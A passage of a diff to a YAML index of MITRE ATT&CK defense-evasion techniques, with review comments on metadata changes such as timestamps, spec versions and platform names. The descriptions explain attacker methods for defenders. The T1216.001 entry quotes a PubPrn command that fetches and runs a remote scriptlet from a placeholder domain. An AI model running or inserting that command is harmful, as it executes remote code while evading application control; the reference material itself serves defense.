Monitor PAM configuration and module paths (ex: /etc/pam.d/
) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.
Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times (ex: when the user is not present) or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'File: File Modification'
- 'Logon Session: Logon Session Creation'
- x_mitre_permissions_required:
- - root
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
+ created: '2020-06-26T04:01:09.648Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/003
+ external_id: T1556.003
+ - source_name: Apple PAM
+ description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
+ Retrieved June 25, 2020.
+ url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
+ - source_name: Man Pam_Unix
+ description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
+ 25, 2020.
+ url: https://linux.die.net/man/8/pam_unix
+ - source_name: PAM Creds
+ description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
+ PAM backdoors & DNS requests. Retrieved June 26, 2020.
+ url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
+ - source_name: Red Hat PAM
+ description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
+ (PAM). Retrieved June 25, 2020.
+ url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
+ - source_name: PAM Backdoor
+ description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
+ 25, 2020.
+ url: https://github.com/zephrax/linux-pam-backdoor
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1556.003
atomic_tests: []
T1578.004:
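Review bot: the one semantic deletion in this reorder is `x_mitre_permissions_required: - root`, which is removed and not re-added, alongside `x_mitre_version: '2.0'` -> `'2.1'` and the new `x_mitre_deprecated: false` / `revoked: false` flags. Anything downstream that renders or filters on `permissions_required` now has to tolerate the key being absent on this object. The `external_references` list also changes order (`PAM Creds` now precedes `Red Hat PAM` and `PAM Backdoor`); that is harmless because citations resolve by `source_name`, not position, but it is another reason to prefer a deterministic key and list order in the generator.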
@@ -518,7 +537,7 @@ defense-evasion:
url: https://cloud.google.com/compute/docs/disks/restore-and-delete-snapshots
description: Google. (2019, October 7). Restoring and deleting persistent
disk snapshots. Retrieved October 8, 2019.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-03-08T10:33:02.128Z'
name: Revert Cloud Instance
description: |-
An adversary may revert changes made to a cloud instance after they have performed malicious activities in attempt to evade detection and remove evidence of their presence. In highly virtualized environments, such as cloud-based infrastructure, this may be accomplished by restoring virtual machine (VM) or data storage snapshots through the cloud management dashboard or cloud APIs.
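Review bot: `modified` for T1578.004 moves backwards in time (2022-04-25 -> 2021-03-08), and the same happens elsewhere in this diff: T1216.001 (2022-05-11 -> 2022-04-18), T1014 (2023-05-09 -> 2023-03-30), T1036.007 (2022-04-25 -> 2021-10-14), T1548.002 (2023-05-09 -> 2023-04-21), T1548.003 (2022-05-11 -> 2022-03-14), T1218.013 (2022-05-11 -> 2022-04-19), T1600 (2021-04-29 -> 2020-10-21), T1562.009 (2022-04-25 -> 2021-08-31) and T1542.005 (2021-04-29 -> 2020-10-22). The old values share a handful of identical timestamps (`14:00:00.188Z`, `14:49:39.188Z`), which look like bundle-level stamps, while the new ones look like per-object stamps, so this is probably the upstream data being read more precisely rather than a regression to an older snapshot. Please confirm that and state it in the commit message, since any "changed since" logic keyed on `modified` will see these objects as older than before.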
@@ -545,8 +564,6 @@ defense-evasion:
- 'Instance: Instance Modification'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1564.012:
technique:
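Review bot: this hunk removes both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` from T1578.004 with no `+` line replacing the latter, and the same removal with no visible replacement occurs for T1036.007, T1548.003, T1600, T1562.009 and T1542.005. Compare T1574.011 later in the diff, where the removed `x_mitre_attack_spec_version: 2.1.0` is re-added as `3.2.0` at the end of the object in a separate hunk. Please verify that these six objects still carry an `x_mitre_attack_spec_version` key somewhere outside the shown context; if not, either the upstream objects genuinely lack it (unlikely for current ATT&CK data) or the generator is dropping the key for objects that were still at 2.1.0.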
@@ -588,7 +605,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1222.002:
technique:
@@ -666,7 +682,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1222.002
atomic_tests: []
T1216.001:
@@ -703,7 +718,7 @@ defense-evasion:
Adversaries may abuse PubPrn to execute malicious payloads hosted on remote sites.(Citation: Enigma0x3 PubPrn Bypass) To do so, adversaries may set the second script:
parameter to reference a scriptlet file (.sct) hosted on a remote site. An example command is pubprn.vbs 127.0.0.1 script:https://mydomain.com/folder/file.sct
. This behavior may bypass signature validation restrictions and application control solutions that do not account for abuse of this script.
In later versions of Windows (10+), PubPrn.vbs
has been updated to prevent proxying execution from a remote site. This is done by limiting the protocol specified in the second parameter to LDAP://
, vice the script:
moniker which could be used to reference remote code via HTTP(S).
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-18T14:55:35.817Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Signed Script Proxy Execution: Pubprn'
x_mitre_detection: Monitor script processes, such as `cscript`, and command-line
@@ -722,7 +737,6 @@ defense-evasion:
- Application Control
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1216.001
atomic_tests: []
T1574.007:
@@ -812,7 +826,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1006:
technique:
@@ -870,12 +883,87 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1006
atomic_tests: []
+ T1666:
+ technique:
+ modified: '2024-09-25T16:15:41.224Z'
+ name: Modify Cloud Resource Hierarchy
+ description: "Adversaries may attempt to modify hierarchical structures in infrastructure-as-a-service
+ (IaaS) environments in order to evade defenses. \n\nIaaS environments often
+ group resources into a hierarchy, enabling improved resource management and
+ application of policies to relevant groups. Hierarchical structures differ
+ among cloud providers. For example, in AWS environments, multiple accounts
+ can be grouped under a single organization, while in Azure environments, multiple
+ subscriptions can be grouped under a single management group.(Citation: AWS
+ Organizations)(Citation: Microsoft Azure Resources)\n\nAdversaries may add,
+ delete, or otherwise modify resource groups within an IaaS hierarchy. For
+ example, in Azure environments, an adversary who has gained access to a Global
+ Administrator account may create new subscriptions in which to deploy resources.
+ They may also engage in subscription hijacking by transferring an existing
+ pay-as-you-go subscription from a victim tenant to an adversary-controlled
+ tenant. This will allow the adversary to use the victim’s compute resources
+ without generating logs on the victim tenant.(Citation: Microsoft Peach Sandstorm
+ 2023)(Citation: Microsoft Subscription Hijacking 2022)\n\nIn AWS environments,
+ adversaries with appropriate permissions in a given account may call the `LeaveOrganization`
+ API, causing the account to be severed from the AWS Organization to which
+ it was tied and removing any Service Control Policies, guardrails, or restrictions
+ imposed upon it by its former Organization. Alternatively, adversaries may
+ call the `CreateAccount` API in order to create a new account within an AWS
+ Organization. This account will use the same payment methods registered to
+ the payment account but may not be subject to existing detections or Service
+ Control Policies.(Citation: AWS RE:Inforce Threat Detection 2024)"
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - IaaS
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Cloud Service: Cloud Service Modification'
+ type: attack-pattern
+ id: attack-pattern--0ce73446-8722-4086-9d43-514f1d0f669e
+ created: '2024-09-25T14:16:19.234Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1666
+ external_id: T1666
+ - source_name: AWS Organizations
+ description: AWS. (n.d.). Terminology and concepts for AWS Organizations.
+ Retrieved September 25, 2024.
+ url: https://docs.aws.amazon.com/organizations/latest/userguide/orgs_getting-started_concepts.html
+ - source_name: AWS RE:Inforce Threat Detection 2024
+ description: Ben Fletcher and Steve de Vera. (2024, June). New tactics and
+ techniques for proactive threat detection. Retrieved September 25, 2024.
+ url: https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf
+ - source_name: Microsoft Subscription Hijacking 2022
+ description: Dor Edry. (2022, August 24). Hunt for compromised Azure subscriptions
+ using Microsoft Defender for Cloud Apps. Retrieved September 5, 2023.
+ url: https://techcommunity.microsoft.com/t5/microsoft-365-defender-blog/hunt-for-compromised-azure-subscriptions-using-microsoft/ba-p/3607121
+ - source_name: Microsoft Azure Resources
+ description: Microsoft Azure. (2024, May 31). Organize your Azure resources
+ effectively. Retrieved September 25, 2024.
+ url: https://learn.microsoft.com/en-us/azure/cloud-adoption-framework/ready/azure-setup-guide/organize-resources
+ - source_name: Microsoft Peach Sandstorm 2023
+ description: Microsoft Threat Intelligence. (2023, September 14). Peach Sandstorm
+ password spray campaigns enable intelligence collection at high-value targets.
+ Retrieved September 18, 2023.
+ url: https://www.microsoft.com/en-us/security/blog/2023/09/14/peach-sandstorm-password-spray-campaigns-enable-intelligence-collection-at-high-value-targets/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1564.008:
technique:
- modified: '2023-10-16T16:41:53.957Z'
+ modified: '2024-10-15T15:56:27.592Z'
name: 'Hide Artifacts: Email Hiding Rules'
description: |-
Adversaries may use email rules to hide inbound emails in a compromised user's mailbox. Many email clients allow users to create inbox rules for various email functions, including moving emails to other folders, marking emails as read, or deleting emails. Rules may be created or modified within email clients or through external features such as the New-InboxRule
or Set-InboxRule
[PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets on Windows systems.(Citation: Microsoft Inbox Rules)(Citation: MacOS Email Rules)(Citation: Microsoft New-InboxRule)(Citation: Microsoft Set-InboxRule)
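Review bot: the new T1666 object is added with `x_mitre_detection: ''` (an empty string, where every other object in this diff carries a populated block scalar) and `atomic_tests: []`. Make sure the renderer treats the empty string as "no detection guidance" rather than emitting a blank section, and that the index generators skip a technique with no atomic tests rather than adding an empty row. From a defender's point of view the gap is notable: the description names the AWS `LeaveOrganization` and `CreateAccount` calls and Azure subscription transfers, and the data source is `Cloud Service: Cloud Service Modification`, so there is an obvious place to hang detection notes once upstream supplies them. The `AWS RE:Inforce Threat Detection 2024` reference here is byte-identical to the one added to T1484.002 later in the diff, which is what you want for a shared citation key.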
@@ -901,11 +989,10 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- - Office 365
- Linux
- macOS
- - Google Workspace
- x_mitre_version: '1.3'
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Application Log: Application Log Content'
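Review bot: T1564.008 loses the `Office 365` and `Google Workspace` platforms and gains `Office Suite` (version 1.3 -> 1.4); the same consolidation appears for T1564 (`Office 365` -> `Office Suite`, 1.2 -> 1.3) and T1484.002 (`Azure AD` and `SaaS` -> `Identity Provider`, 2.0 -> 2.1). Any per-platform index, filter or test selector in this repository that still matches the literal strings "Office 365", "Google Workspace" or "Azure AD" will silently stop matching these techniques, so the platform-to-index mapping should be updated in the same change (or the commit message should say why it is not needed yet, e.g. because none of these three objects currently has atomic tests).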
@@ -950,12 +1037,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1564.008
atomic_tests: []
T1027.013:
technique:
- modified: '2024-04-19T04:03:07.164Z'
+ modified: '2024-10-15T16:32:45.108Z'
name: Encrypted/Encoded File
description: "Adversaries may encrypt or encode files to obfuscate strings,
bytes, and other specific patterns to impede detection. Encrypting and/or
@@ -1026,11 +1112,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1014:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:50.568Z'
name: Rootkit
description: "Adversaries may use rootkits to hide the presence of programs,
files, network connections, services, drivers, and other system components.
@@ -1098,7 +1183,6 @@ defense-evasion:
url: https://en.wikipedia.org/wiki/Rootkit
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1014
atomic_tests: []
T1036.007:
@@ -1129,7 +1213,7 @@ defense-evasion:
url: https://www.seqrite.com/blog/how-to-avoid-dual-attack-and-vulnerable-files-with-double-extension/
description: Seqrite. (n.d.). How to avoid dual attack and vulnerable files
with double extension?. Retrieved July 27, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-14T21:09:59.588Z'
name: 'Masquerading: Double File Extension'
description: "Adversaries may abuse a double extension in the filename as a
means of masquerading the true file type. A file name may include a secondary
@@ -1166,13 +1250,11 @@ defense-evasion:
x_mitre_data_sources:
- 'File: File Creation'
- 'File: File Metadata'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1036.007
atomic_tests: []
T1548.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:35:39.112Z'
name: 'Abuse Elevation Control Mechanism: Bypass User Account Control'
description: |-
Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.(Citation: TechNet How UAC Works)
@@ -1273,7 +1355,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1548.002
atomic_tests: []
T1548.003:
@@ -1304,7 +1385,7 @@ defense-evasion:
description: Amit Serper. (2018, May 10). ProtonB What this Mac Malware Actually
Does. Retrieved March 19, 2018.
source_name: cybereason osx proton
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-14T16:28:19.781Z'
name: 'Abuse Elevation Control Mechanism: Sudo and Sudo Caching'
description: |-
Adversaries may perform sudo caching and/or use the sudoers file to elevate privileges. Adversaries may do this to execute commands as other users or spawn processes with higher privileges.
@@ -1338,13 +1419,11 @@ defense-evasion:
- User
x_mitre_effective_permissions:
- root
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1548.003
atomic_tests: []
T1578:
technique:
- modified: '2023-09-05T20:45:22.041Z'
+ modified: '2024-09-30T13:28:37.414Z'
name: Modify Cloud Compute Infrastructure
description: |-
An adversary may attempt to modify a cloud account's compute service infrastructure to evade defenses. A modification to the compute service infrastructure can include the creation, deletion, or modification of one or more components such as compute instances, virtual machines, and snapshots.
@@ -1396,12 +1475,11 @@ defense-evasion:
- source_name: Mandiant M-Trends 2020
description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
2020.
- url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
+ url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1542.001:
technique:
@@ -1481,12 +1559,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1542.001
atomic_tests: []
T1574.011:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-09-12T19:42:48.016Z'
name: 'Hijack Execution Flow: Services Registry Permissions Weakness'
description: |-
Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts. Windows stores local service configuration information in the Registry under HKLM\SYSTEM\CurrentControlSet\Services
. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe, [PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through access control lists and user permissions. (Citation: Registry Key Security)(Citation: malware_hides_service)
@@ -1505,7 +1582,6 @@ defense-evasion:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- x_mitre_attack_spec_version: 2.1.0
x_mitre_contributors:
- Travis Smith, Tripwire
- Matthew Demaske, Adaptforward
@@ -1519,7 +1595,6 @@ defense-evasion:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.1'
@@ -1546,8 +1621,8 @@ defense-evasion:
external_id: T1574.011
- source_name: Tweet Registry Perms Weakness
description: "@r0wdy_. (2017, November 30). Service Recovery Parameters. Retrieved
- April 9, 2018."
- url: https://twitter.com/r0wdy_/status/936365549553991680
+ September 12, 2024."
+ url: https://x.com/r0wdy_/status/936365549553991680
- source_name: insecure_reg_perms
description: Clément Labro. (2020, November 12). Windows RpcEptMapper Service
Insecure Registry Permissions EoP. Retrieved August 25, 2021.
@@ -1578,7 +1653,8 @@ defense-evasion:
url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_zegost
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1574.011
atomic_tests: []
T1542.003:
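Review bot: the two keys added here, `x_mitre_attack_spec_version: 3.2.0` and `x_mitre_modified_by_ref`, are the ones deleted from the middle of the same T1574.011 object in the two preceding hunks, so across the object the net change is spec 2.1.0 -> 3.2.0 plus the `modified` bump to 2024-09-12 and the refreshed tweet citation (twitter.com -> x.com, retrieval date updated), with `x_mitre_version` unchanged at '1.1'. That is consistent with upstream treating a citation URL refresh as a non-versioned edit; the hunk itself is fine, but it is another case where a stable key order in the generator would turn three hunks into one.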
@@ -1635,7 +1711,6 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
atomic_tests: []
T1218.013:
technique:
@@ -1688,7 +1763,7 @@ defense-evasion:
PID /HMODULE=BASE_ADDRESS PATH_DLL ORDINAL_NUMBER). This command would
inject an import table entry consisting of the specified DLL into the module
at the given base address.(Citation: Mavinject Functionality Deconstructed)"
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-19T17:35:08.315Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Mavinject
x_mitre_detection: |-
@@ -1704,11 +1779,10 @@ defense-evasion:
- 'Process: Process Creation'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1036.005:
technique:
- modified: '2023-09-14T21:12:48.409Z'
+ modified: '2024-09-12T19:30:45.064Z'
name: 'Masquerading: Match Legitimate Name or Location'
description: |-
Adversaries may match or approximate the name or location of legitimate files or resources when naming/placing them. This is done for the sake of evading defenses and observation. This may be done by placing an executable in a commonly trusted directory (ex: under System32) or giving it the name of a legitimate, trusted program (ex: svchost.exe). In containerized environments, this may also be done by creating a resource in a namespace that matches the naming convention of a container pod or cluster. Alternatively, a file or container image name given may be a close approximation to legitimate programs/images or something innocuous.
@@ -1754,8 +1828,8 @@ defense-evasion:
external_id: T1036.005
- source_name: Twitter ItsReallyNick Masquerading Update
description: Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading.
- Retrieved April 22, 2019.
- url: https://twitter.com/ItsReallyNick/status/1055321652777619457
+ Retrieved September 12, 2024.
+ url: https://x.com/ItsReallyNick/status/1055321652777619457
- source_name: Docker Images
description: Docker. (n.d.). Docker Images. Retrieved April 6, 2021.
url: https://docs.docker.com/engine/reference/commandline/images/
@@ -1765,9 +1839,8 @@ defense-evasion:
url: https://www.elastic.co/blog/how-hunt-masquerade-ball
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1036.005
atomic_tests: []
T1600:
@@ -1794,7 +1867,7 @@ defense-evasion:
url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
description: Omar Santos. (2020, October 19). Attackers Continue to Target
Legacy Devices. Retrieved October 20, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-21T22:37:49.258Z'
name: Weaken Encryption
description: |-
Adversaries may compromise a network device’s encryption capability in order to bypass encryption that would otherwise protect data communications. (Citation: Cisco Synful Knock Evolution)
@@ -1818,8 +1891,6 @@ defense-evasion:
x_mitre_permissions_required:
- Administrator
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1036.008:
technique:
@@ -1883,11 +1954,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1564:
technique:
- modified: '2024-03-29T17:45:48.126Z'
+ modified: '2024-10-15T15:58:49.815Z'
name: Hide Artifacts
description: |-
Adversaries may attempt to hide artifacts associated with their behaviors to evade detection. Operating systems may have features to hide various artifacts, such as important system files and administrative task execution, to avoid disrupting user work environments and prevent users from changing files or features on the system. Adversaries may abuse these features to hide artifacts such as files, directories, user accounts, or other system activity to evade detection.(Citation: Sofacy Komplex Trojan)(Citation: Cybereason OSX Pirrit)(Citation: MalwareBytes ADS July 2015)
@@ -1908,8 +1978,8 @@ defense-evasion:
- Linux
- macOS
- Windows
- - Office 365
- x_mitre_version: '1.2'
+ - Office Suite
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'File: File Metadata'
- 'Application Log: Application Log Content'
@@ -1953,12 +2023,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1564
atomic_tests: []
T1484.002:
technique:
- modified: '2024-04-19T04:27:51.388Z'
+ modified: '2024-09-25T13:50:11.593Z'
name: Domain Trust Modification
description: "Adversaries may add new domain trusts, modify the properties of
existing domain trusts, or otherwise change the configuration of trust relationships
@@ -1978,9 +2047,14 @@ defense-evasion:
trust modifications such as altering the claim issuance rules to log in any
valid set of credentials as a specified user.(Citation: AADInternals zure
AD Federated Domain) \n\nAn adversary may also add a new federated identity
- provider to an identity tenant such as Okta, which may enable the adversary
- to authenticate as any user of the tenant.(Citation: Okta Cross-Tenant Impersonation
- 2023)"
+ provider to an identity tenant such as Okta or AWS IAM Identity Center, which
+ may enable the adversary to authenticate as any user of the tenant.(Citation:
+ Okta Cross-Tenant Impersonation 2023) This may enable the threat actor to
+ gain broad access into a variety of cloud-based services that leverage the
+ identity tenant. For example, in AWS environments, an adversary that creates
+ a new identity provider for an AWS Organization will be able to federate into
+ all of the AWS Organization member accounts without creating identities for
+ each of the member accounts.(Citation: AWS RE:Inforce Threat Detection 2024)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
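Review bot: the rewritten description introduces a new citation token, `(Citation: AWS RE:Inforce Threat Detection 2024)`, so the object must also gain a matching `external_references` entry with exactly that `source_name`; that entry is added in a later hunk of this same object, so the pair is consistent, but reviewers of future upstream syncs should check the two together because a description-only update would leave a dangling citation. The context lines also carry the pre-existing key `AADInternals zure AD Federated Domain` ("zure" for "Azure"); like the other citation keys in this file it mirrors upstream and must not be edited locally, since the `(Citation: ...)` token in the description uses the same misspelling.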
@@ -2000,9 +2074,8 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- - Azure AD
- - SaaS
- x_mitre_version: '2.0'
+ - Identity Provider
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Application Log: Application Log Content'
@@ -2019,6 +2092,10 @@ defense-evasion:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1484/002
external_id: T1484.002
+ - source_name: AWS RE:Inforce Threat Detection 2024
+ description: Ben Fletcher and Steve de Vera. (2024, June). New tactics and
+ techniques for proactive threat detection. Retrieved September 25, 2024.
+ url: https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf
- source_name: CISA SolarWinds Cloud Detection
description: CISA. (2021, January 8). Detecting Post-Compromise Threat Activity
in Microsoft Cloud Environments. Retrieved January 8, 2021.
@@ -2052,7 +2129,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1484.002
atomic_tests: []
T1562.009:
@@ -2102,7 +2178,7 @@ defense-evasion:
url: https://docs.microsoft.com/windows-server/administration/windows-commands/bootcfg
description: Gerend, J. et al. (2017, October 16). bootcfg. Retrieved August
30, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-08-31T14:51:47.352Z'
name: 'Impair Defenses: Safe Boot Mode'
description: |-
Adversaries may abuse Windows safe mode to disable endpoint defenses. Safe mode starts up the Windows operating system with a limited set of drivers and services. Third-party security software such as endpoint detection and response (EDR) tools may not start after booting Windows in safe mode. There are two versions of safe mode: Safe Mode and Safe Mode with Networking. It is possible to start additional services after a safe mode boot.(Citation: Microsoft Safe Mode)(Citation: Sophos Snatch Ransomware 2019)
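Review bot: the `modified` timestamp for T1562.009 moves backwards, from `2022-04-25T14:00:00.188Z` to `2021-08-31T14:51:47.352Z`, and the same regression appears on T1542.005, T1070.002, T1218.004, T1553.001, T1222.001, T1218.007, T1600.001, T1055.003, T1055 and T1205. Every one of the old values ends in `.188Z` and most share an identical `14:00:00` time, which points to the previous index carrying a release-wide batch stamp while the new one carries each object's own `modified`. The new value is probably the more accurate one, but any consumer that compares `modified` to detect updates will now see these objects as older than before, so call the change of source out explicitly.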
@@ -2130,8 +2206,6 @@ defense-evasion:
- Anti-virus
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
